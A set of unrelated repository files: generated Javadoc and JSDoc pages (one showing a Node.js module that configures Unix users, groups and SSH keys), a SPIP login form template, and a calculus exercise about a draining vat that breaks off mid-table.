allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
docs/accepts/0.0.1/modules_Users_client_managers_user.js.html | dparlevliet/fer | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>modules/Users/client/managers/user.js - Documentation</title>
<script src="scripts/prettify/prettify.js"></script>
<script src="scripts/prettify/lang-css.js"></script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<input type="checkbox" id="nav-trigger" class="nav-trigger" />
<label for="nav-trigger" class="navicon-button x">
<div class="navicon"></div>
</label>
<label for="nav-trigger" class="overlay"></label>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Global</h3><ul><li><a href="global.html#Component">Component</a></li><li><a href="global.html#GroupsConfig">GroupsConfig</a></li><li><a href="global.html#UserConfig">UserConfig</a></li></ul>
</nav>
<div id="main">
<h1 class="page-title">modules/Users/client/managers/user.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/* global fer */
var bin = require('../bin/index.js');
var Groups = bin.Groups;
var Users = bin.Users;
/**
{
user: {
testuser: {
name: "Full User Name",
uid: 1000,
gid: 1000,
groups: ["testgroup", "wheel"],
password: '12345', # Preferably specify a MD5 encoded password instead of plaintext
force_password: true, # Reset the password if it's changed on the system
home: "/home/testuser", # Create home directory here
shell: "/bin/bash",
ssh_keys: ["testuser"],
homedir_mode: 0750,
},
baduser: null, # Remove this user
}
}
*/
var UserConfig = (function() {
function UserConfig(config, callback) {
fer.value(config).then(function(config) {
fer.reduce(Object.keys(config), function(uname, offset, deferred) {
fer.log(2, 'Handling configuration for {1}'.format(uname), 1);
fer.value(config[uname]).then(function(config) {
if (config === null) {
fer.log(3, 'Ensuring that {1} is deleted'.format(uname), 2);
return Users.delete(uname).then(function() {
deferred.resolve();
});
}
fer.log(3, 'Looking for groups to create', 2);
fer.do(function(_deferred) {
if (config.groups) {
fer.value(config.groups).then(function(groups) {
fer.reduce(groups, function(group, offset, _deferred) {
Groups.check_exists(group).then(function(exists) {
if (exists) {
return _deferred.resolve();
}
fer.log(0, 'Creating group {1}'.format(group), 3);
Groups.create(group).then(function() {
_deferred.resolve();
});
});
}).then(function() {
_deferred.resolve();
});
});
} else {
fer.log(3, 'No usable groups found', 3);
_deferred.resolve();
}
}).then(function() {
fer.log(3, 'Checking to see if {1} needs to be created.'.format(uname), 2);
return fer.do(function(_deferred) {
// does this user belong to the groups we need it to belong to?
Users.check_exists(uname).then(function(exists) {
if (!exists) {
fer.log(0, 'Creating user {1}'.format(uname), 3);
Users.create(uname, config[uname]).then(function() {
_deferred.resolve();
});
} else {
fer.log(3, 'Not creating {1}'.format(uname), 3);
_deferred.resolve();
}
});
});
}).then(function() {
return fer.do(function(deferred) {
// check to see if we should modify the user at all
var userInfo = fer.posix.getpwnam(uname);
if (
userInfo.shell != config.shell ||
userInfo.passwd != config.passwd ||
userInfo.dir != config.home ||
userInfo.uid != config.uid ||
userInfo.gid != config.gid
) {
Users.update(uname, config).then(function() {
deferred.resolve();
});
} else {
deferred.resolve();
}
});
}).then(function() {
return fer.do(function(deferred) {
if (config.homedir_mode) {
var userInfo = fer.posix.getpwnam(uname);
fer.command(
'chmod {1} {2}'.format(config.homedir_mode, userInfo.dir)
).then(function() {
deferred.resolve();
});
} else {
deferred.resolve();
}
});
}).then(function() {
return fer.do(function(deferred) {
// install ssh keys
fer.value(config.ssh_keys).then(function(ssh_keys) {
if (!ssh_keys || !ssh_keys.forEach) {
return deferred.resolve();
}
fer.log(2, 'Installing SSH keys', 2);
fer.reduce(ssh_keys, function(key, offset, deferred) {
Users.install_ssh_key(uname, key).then(function() {
deferred.resolve();
});
}).then(function() {
deferred.resolve();
});
});
});
}).then(function() {
fer.log(2, "Done setting up " + uname, 1);
deferred.resolve();
});
});
}).then(function() {
callback();
});
});
}
return UserConfig;
}());
module.exports = {
help: function() {
return fer.fs.readFileSync(__dirname + '/../help/users.txt').toString();
},
run_at: function() {
return fer.base_run_at + 200;
},
cls: UserConfig,
};</code></pre>
</article>
</section>
</div>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc3/jsdoc">JSDoc 3.4.3</a> on Fri Nov 11 2016 18:21:04 GMT+1100 (AEDT) using the Minami theme.
</footer>
<script>prettyPrint();</script>
<script src="scripts/linenumber.js"></script>
</body>
</html>
|
doc/domain/model/Flight.html | Maracars/POPBL5 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (1.8.0_111) on Wed Jan 04 19:28:24 CET 2017 -->
<title>Flight</title>
<meta name="date" content="2017-01-04">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Flight";
}
}
catch(err) {
}
//-->
var methods = {"i0":10,"i1":10,"i2":10,"i3":10,"i4":10,"i5":10,"i6":10,"i7":10,"i8":10,"i9":10,"i10":10,"i11":10,"i12":10,"i13":10,"i14":10,"i15":10,"i16":10,"i17":10};
var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]};
var altColor = "altColor";
var rowColor = "rowColor";
var tableTab = "tableTab";
var activeTableTab = "activeTableTab";
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/Flight.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../domain/model/Delay.html" title="class in domain.model"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../domain/model/Gate.html" title="class in domain.model"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../index.html?domain/model/Flight.html" target="_top">Frames</a></li>
<li><a href="Flight.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">domain.model</div>
<h2 title="Class Flight" class="title">Class Flight</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>domain.model.Flight</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>@Entity
public class <span class="typeNameLabel">Flight</span>
extends java.lang.Object</pre>
<div class="block">The Class Flight.</div>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#Flight--">Flight</a></span>()</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd"> </span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd"> </span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd"> </span></span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr id="i0" class="altColor">
<td class="colFirst"><code>java.util.Date</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getExpectedArrivalDate--">getExpectedArrivalDate</a></span>()</code>
<div class="block">Gets the expected arrival date.</div>
</td>
</tr>
<tr id="i1" class="rowColor">
<td class="colFirst"><code>java.util.Date</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getExpectedDepartureDate--">getExpectedDepartureDate</a></span>()</code>
<div class="block">Gets the expected departure date.</div>
</td>
</tr>
<tr id="i2" class="altColor">
<td class="colFirst"><code>java.lang.Integer</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getId--">getId</a></span>()</code>
<div class="block">Gets the id.</div>
</td>
</tr>
<tr id="i3" class="rowColor">
<td class="colFirst"><code>java.util.Collection<<a href="../../domain/model/users/Passenger.html" title="class in domain.model.users">Passenger</a>></code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getPassengerList--">getPassengerList</a></span>()</code>
<div class="block">Gets the passenger list.</div>
</td>
</tr>
<tr id="i4" class="altColor">
<td class="colFirst"><code><a href="../../domain/model/Plane.html" title="class in domain.model">Plane</a></code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getPlane--">getPlane</a></span>()</code>
<div class="block">Gets the plane.</div>
</td>
</tr>
<tr id="i5" class="rowColor">
<td class="colFirst"><code>java.lang.Float</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getPrice--">getPrice</a></span>()</code>
<div class="block">Gets the price.</div>
</td>
</tr>
<tr id="i6" class="altColor">
<td class="colFirst"><code>java.util.Date</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getRealArrivalDate--">getRealArrivalDate</a></span>()</code>
<div class="block">Gets the real arrival date.</div>
</td>
</tr>
<tr id="i7" class="rowColor">
<td class="colFirst"><code>java.util.Date</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getRealDepartureDate--">getRealDepartureDate</a></span>()</code>
<div class="block">Gets the real departure date.</div>
</td>
</tr>
<tr id="i8" class="altColor">
<td class="colFirst"><code><a href="../../domain/model/Route.html" title="class in domain.model">Route</a></code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#getRoute--">getRoute</a></span>()</code>
<div class="block">Gets the route.</div>
</td>
</tr>
<tr id="i9" class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setExpectedArrivalDate-java.util.Date-">setExpectedArrivalDate</a></span>(java.util.Date expectedArrivalDate)</code>
<div class="block">Sets the expected arrival date.</div>
</td>
</tr>
<tr id="i10" class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setExpectedDepartureDate-java.util.Date-">setExpectedDepartureDate</a></span>(java.util.Date expectedDepartureDate)</code>
<div class="block">Sets the expected departure date.</div>
</td>
</tr>
<tr id="i11" class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setId-java.lang.Integer-">setId</a></span>(java.lang.Integer id)</code>
<div class="block">Sets the id.</div>
</td>
</tr>
<tr id="i12" class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setPassengerList-java.util.Collection-">setPassengerList</a></span>(java.util.Collection<<a href="../../domain/model/users/Passenger.html" title="class in domain.model.users">Passenger</a>> passengerList)</code>
<div class="block">Sets the passenger list.</div>
</td>
</tr>
<tr id="i13" class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setPlane-domain.model.Plane-">setPlane</a></span>(<a href="../../domain/model/Plane.html" title="class in domain.model">Plane</a> plane)</code>
<div class="block">Sets the plane.</div>
</td>
</tr>
<tr id="i14" class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setPrice-java.lang.Float-">setPrice</a></span>(java.lang.Float price)</code>
<div class="block">Sets the price.</div>
</td>
</tr>
<tr id="i15" class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setRealArrivalDate-java.util.Date-">setRealArrivalDate</a></span>(java.util.Date realArrivalDate)</code>
<div class="block">Sets the real arrival date.</div>
</td>
</tr>
<tr id="i16" class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setRealDepartureDate-java.util.Date-">setRealDepartureDate</a></span>(java.util.Date realDepartureDate)</code>
<div class="block">Sets the real departure date.</div>
</td>
</tr>
<tr id="i17" class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../domain/model/Flight.html#setRoute-domain.model.Route-">setRoute</a></span>(<a href="../../domain/model/Route.html" title="class in domain.model">Route</a> route)</code>
<div class="block">Sets the route.</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="Flight--">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>Flight</h4>
<pre>public Flight()</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method.detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="getPrice--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getPrice</h4>
<pre>public java.lang.Float getPrice()</pre>
<div class="block">Gets the price.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the price</dd>
</dl>
</li>
</ul>
<a name="setPrice-java.lang.Float-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setPrice</h4>
<pre>public void setPrice(java.lang.Float price)</pre>
<div class="block">Sets the price.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>price</code> - the new price</dd>
</dl>
</li>
</ul>
<a name="getPlane--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getPlane</h4>
<pre>public <a href="../../domain/model/Plane.html" title="class in domain.model">Plane</a> getPlane()</pre>
<div class="block">Gets the plane.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the plane</dd>
</dl>
</li>
</ul>
<a name="setPlane-domain.model.Plane-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setPlane</h4>
<pre>public void setPlane(<a href="../../domain/model/Plane.html" title="class in domain.model">Plane</a> plane)</pre>
<div class="block">Sets the plane.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>plane</code> - the new plane</dd>
</dl>
</li>
</ul>
<a name="getRoute--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getRoute</h4>
<pre>public <a href="../../domain/model/Route.html" title="class in domain.model">Route</a> getRoute()</pre>
<div class="block">Gets the route.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the route</dd>
</dl>
</li>
</ul>
<a name="setRoute-domain.model.Route-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setRoute</h4>
<pre>public void setRoute(<a href="../../domain/model/Route.html" title="class in domain.model">Route</a> route)</pre>
<div class="block">Sets the route.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>route</code> - the new route</dd>
</dl>
</li>
</ul>
<a name="getId--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getId</h4>
<pre>public java.lang.Integer getId()</pre>
<div class="block">Gets the id.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the id</dd>
</dl>
</li>
</ul>
<a name="setId-java.lang.Integer-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setId</h4>
<pre>public void setId(java.lang.Integer id)</pre>
<div class="block">Sets the id.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>id</code> - the new id</dd>
</dl>
</li>
</ul>
<a name="getRealDepartureDate--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getRealDepartureDate</h4>
<pre>public java.util.Date getRealDepartureDate()</pre>
<div class="block">Gets the real departure date.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the real departure date</dd>
</dl>
</li>
</ul>
<a name="setRealDepartureDate-java.util.Date-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setRealDepartureDate</h4>
<pre>public void setRealDepartureDate(java.util.Date realDepartureDate)</pre>
<div class="block">Sets the real departure date.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>realDepartureDate</code> - the new real departure date</dd>
</dl>
</li>
</ul>
<a name="getRealArrivalDate--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getRealArrivalDate</h4>
<pre>public java.util.Date getRealArrivalDate()</pre>
<div class="block">Gets the real arrival date.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the real arrival date</dd>
</dl>
</li>
</ul>
<a name="setRealArrivalDate-java.util.Date-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setRealArrivalDate</h4>
<pre>public void setRealArrivalDate(java.util.Date realArrivalDate)</pre>
<div class="block">Sets the real arrival date.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>realArrivalDate</code> - the new real arrival date</dd>
</dl>
</li>
</ul>
<a name="getExpectedDepartureDate--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getExpectedDepartureDate</h4>
<pre>public java.util.Date getExpectedDepartureDate()</pre>
<div class="block">Gets the expected departure date.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the expected departure date</dd>
</dl>
</li>
</ul>
<a name="setExpectedDepartureDate-java.util.Date-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setExpectedDepartureDate</h4>
<pre>public void setExpectedDepartureDate(java.util.Date expectedDepartureDate)</pre>
<div class="block">Sets the expected departure date.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>expectedDepartureDate</code> - the new expected departure date</dd>
</dl>
</li>
</ul>
<a name="getExpectedArrivalDate--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getExpectedArrivalDate</h4>
<pre>public java.util.Date getExpectedArrivalDate()</pre>
<div class="block">Gets the expected arrival date.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the expected arrival date</dd>
</dl>
</li>
</ul>
<a name="setExpectedArrivalDate-java.util.Date-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>setExpectedArrivalDate</h4>
<pre>public void setExpectedArrivalDate(java.util.Date expectedArrivalDate)</pre>
<div class="block">Sets the expected arrival date.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>expectedArrivalDate</code> - the new expected arrival date</dd>
</dl>
</li>
</ul>
<a name="getPassengerList--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getPassengerList</h4>
<pre>public java.util.Collection<<a href="../../domain/model/users/Passenger.html" title="class in domain.model.users">Passenger</a>> getPassengerList()</pre>
<div class="block">Gets the passenger list.</div>
<dl>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>the passenger list</dd>
</dl>
</li>
</ul>
<a name="setPassengerList-java.util.Collection-">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>setPassengerList</h4>
<pre>public void setPassengerList(java.util.Collection<<a href="../../domain/model/users/Passenger.html" title="class in domain.model.users">Passenger</a>> passengerList)</pre>
<div class="block">Sets the passenger list.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>passengerList</code> - the new passenger list</dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/Flight.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../domain/model/Delay.html" title="class in domain.model"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../domain/model/Gate.html" title="class in domain.model"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../index.html?domain/model/Flight.html" target="_top">Frames</a></li>
<li><a href="Flight.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
prive/formulaires/login.html | spip/SPIP | #HTTP_HEADER{"Cache-Control: no-store, no-cache, must-revalidate"}
#HTTP_HEADER{"Pragma: no-cache"}
<div class='formulaire_spip formulaire_login'>
[<p class="reponse_formulaire reponse_formulaire_ok" role="status">(#ENV**{_deja_loge})</p>]
[<p class="reponse_formulaire reponse_formulaire_ok" role="status">(#ENV*{message_ok})</p>]
[<p class='reponse_formulaire reponse_formulaire_erreur' role="alert">(#ENV*{message_erreur})</p>]
[(#ENV{echec_cookie})
<fieldset class='reponse_formulaire reponse_formulaire_erreur'>
<h2><:avis_erreur_cookie:></h2>
<p class="erreur_message"><:login_cookie_oblige:><br /><:login_cookie_accepte:></p>
</fieldset>]
[(#ENV{editable})
<form id='formulaire_login' method='post' action='#ENV{action}'>
[(#REM) declarer les hidden qui declencheront le service du formulaire parametre : url d'action ]
#ACTION_FORMULAIRE
<fieldset>
<legend><:form_forum_identifiants:></legend>
<div class="editer-groupe">
<div class="editer editer_login obligatoire[(#ENV**{erreurs/var_login}|oui)erreur]">
<label for="var_login"><:login_login2:> <span class="etoile" title="<:info_obligatoire_02|attribut_html:>" aria-label="<:info_obligatoire_02|attribut_html:>">*</span></label>[
<span class="erreur_message">(#ENV**{erreurs/var_login,''}|trim)</span>
]<input type='text' class='text' name='var_login' id='var_login' value="[(#ENV**{var_login})]" size='40'[(#HTML5) required='required' [(#ENV{_autofocus}|et{#ENV**{erreurs}|table_valeur{password}|non})autofocus='autofocus']] autocapitalize="off" autocorrect="off" />
<span id="spip_logo_auteur">[(#ENV*{_logo,''})]</span>
</div>
<div class="editer editer_password obligatoire[(#ENV**{erreurs/password}|oui)erreur]">
<label for="password"><:login_pass2:> <span class="etoile" title="<:info_obligatoire_02|attribut_html:>" aria-label="<:info_obligatoire_02|attribut_html:>">*</span></label>[
<span class="erreur_message">(#ENV**{erreurs/password,''}|trim)</span>
]<input type='password' class='text password' name='password' id='password' value="" size='40' autocapitalize="off" autocorrect="off" [(#HTML5) [(#ENV{_autofocus}|et{#ENV**{erreurs}|table_valeur{password}|oui})autofocus='autofocus']]/>
<p class='details'><a href="[(#URL_PAGE{spip_pass}|parametre_url{lang,#LANG})]" id='spip_pass'><:login_motpasseoublie:></a></p>
</div>
[(#ENV{rester_connecte})
<div class="editer editer_session"><div class='choix'>
<input type="checkbox" class="checkbox" name="session_remember" id="session_remember" value="oui" [(#ENV**{cnx}|?{' '})checked="checked"] onchange="jQuery(this).addClass('modifie');" />
<label class='nofx' for="session_remember"><:login_rester_identifie:></label>
</div></div>]
</div>
</fieldset>
<p class="boutons"><input type="submit" class="btn submit" value="<:bouton_valider|attribut_html:>" /></p>
</form>
]
[(#REM) en cas d'absence de cookie, on represente le formulaire alternatif ]
[<form action="(#ENV{auth_http})" method="get">[
(#ENV{auth_http}|form_hidden)
]
<fieldset>
<legend><:login_sans_cookie:></legend>
<:login_preferez_refuser:>
<input type="hidden" name="essai_auth_http" value="oui"/>
[<input type="hidden" name="url" value="(#ENV{url})"/>]
<p class="boutons"><input type="submit" class="btn submit" value="<:login_sans_cookie|attribut_html:>"/></p>
</fieldset>
</form>
]
</div>
|
output/html/knowl/exercisegroup-vat.html | antalcides/calculus | <!--**************************************-->
<!--* Generated from MathBook XML source *-->
<!--* on 2016-11-30T18:15:13-05:00 *-->
<!--* *-->
<!--* http://mathbook.pugetsound.edu *-->
<!--* *-->
<!--**************************************-->
<div class="exercisegroup">
<h5 class="heading"><span class="type">Exercise Group</span></h5>
<article class="introduction" id="introduction-8"><p id="p-87">Suppose that a vat was undergoing a controlled drain and that the amount of fluid left in the vat (gal) was given by the formula \(\fe{V}{t}=100-2t^{3/2}\) where \(t\) is the number of minutes that had passed since the draining process began.</p></article><div class="exercisegroup-exercises">
<article class="exercise-like" id="exercise-vat-first"><h5 class="heading"><span class="codenumber">18</span></h5>
<p id="p-88">What, <!--Style me with CSS--><em>including unit</em>, is the value of \(\fe{V}{4}\) and what does that value tell you in the context of this problem?</p></article><article class="exercise-like" id="exercise-27"><h5 class="heading"><span class="codenumber">19</span></h5>
<p id="p-89">Ignoring the unit, write down the formula you get for the difference quotient of \(V\) when \(t=4\).</p>
<div class="sidebyside" style="" id="sidebyside-4">
<div class="sbsrow" style="margin-left:0%;margin-right:0%;">
<div class="sbspanel" style="width:50%;justify-content:flex-start;"><p id="p-90">Copy <a knowl="./knowl/table-vat.html" knowl-id="xref-table-vat" alt="Table 1.3.3 " title="Table 1.3.3 ">Table 1.3.3</a> onto your paper and fill in the missing values. <!--Style me with CSS--><em>Look for a pattern in the output and write down enough digits for each entry so that the pattern is clearly illustrated;</em> the first two entries in the output column have been given to help you understand what is meant by this direction.</p></div>
<div class="sbspanel fixed-width" style="width:50%;justify-content:flex-start;"><table>
<tr>
<td class="c m b2 r0 l0 t3 lines">\(h\)</td>
<td class="c m b2 r0 l0 t3 lines">\(y\)</td>
</tr>
<tr>
<td class="l m b0 r0 l0 t0 lines">\(-0.1\)</td>
<td class="l m b0 r0 l0 t0 lines">\(-5.962\ldots\)</td>
</tr>
<tr>
<td class="l m b0 r0 l0 t0 lines">\(-0.01\)</td>
<td class="l m b0 r0 l0 t0 lines">\(-5.9962\ldots\)</td>
</tr>
<tr>
<td class="l m b0 r0 l0 t0 lines">\(-0.001\)</td>
<td class="l m b0 r0 l0 t0 lines"></td>
</tr>
<tr>
<td class="l m b0 r0 l0 t0 lines">\(\phantom{-}0.001\)</td>
<td class="l m b0 r0 l0 t0 lines"></td>
